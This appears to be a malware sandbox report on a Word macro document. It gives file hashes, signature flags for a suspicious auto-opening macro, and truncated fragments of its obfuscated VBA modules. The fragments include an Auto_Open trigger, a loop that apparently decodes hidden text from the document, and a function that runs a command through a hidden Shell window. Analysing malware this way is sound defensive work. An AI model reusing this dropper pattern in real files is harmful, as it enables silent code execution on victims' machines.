General

  • Target

    c683e3a12ab2e80aa4247a1c8ed6b9c565e0241212bc9730596e69ee54807b57

  • Size

    82KB

  • MD5

    9f2f238060db0b5bcac97b4cbc9dbf0c

  • SHA1

    08349ab6aea31cd96799f605cc83a0b893c94177

  • SHA256

    c683e3a12ab2e80aa4247a1c8ed6b9c565e0241212bc9730596e69ee54807b57

  • SHA512

    96e33bca341cd6b92122514a6ad824091b20589b77beec4f2c51a3af88ec9e4bc815daf980c9ce33c1c57d8419e0dd9a9a4b3d9027330db1683688c2a847db29

  • SSDEEP

    1536:3t9605GY3JGY3IXt6e/gL3mgf4eqgcwGQ+/:d96tt6e/22CbfGD

Malware Config

Signatures

  • Office macro that triggers on suspicious action 1 IoCs

    Office document macro which triggers in special circumstances - often malicious.

  • Suspicious Office macro 1 IoCs

    Office document equipped with macros.

Files

  • c683e3a12ab2e80aa4247a1c8ed6b9c565e0241212bc9730596e69ee54807b57
    .doc windows office2003

    ThisDocument

    1
    Attribute VB_Name = "ThisDocument"
    2
    Attribute VB_Base = "1Normal.ThisDocument"
    3
    Attribute VB_GlobalNameSpace = False
    4
    Attribute VB_Creatable = False
    5
    Attribute VB_PredeclaredId = True
    6
    Attribute VB_Exposed = True
    7
    Attribute VB_TemplateDerived = True
    8
    Attribute VB_Customizable = True
    9
    10
    Sub Auto_Open()

    Module1

    1
    Attribute VB_Name = "Module1"
    2
    Sub Hameleon()
    3
    Dim ij As Integer
    4
    Dim charCount As Integer
    5
    charCount = ActiveDocument.Characters.Count - 1
    6
    BHDW = "#"
    7
    JFQW = "$"
    8
    ij = 0
    9
    Do While True
    10
    ij = ij + 1

    Module2

    1
    Attribute VB_Name = "Module2"
    2
    Public Function Fuflmdjoo(a As String)
    3
    Dim bydd As Variant
    4
    bydd = Shell(a, 0)
    5
    NJKHWDWQ = "qwhdjqw jkdghqwdjqqjh djqgw "
    6
    End Function
    7
    Public Function Kakarumba(n As Integer)
    8
    Dim i As Integer
    9
    For i = 1 To n Step 1
    10
    Randomize

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.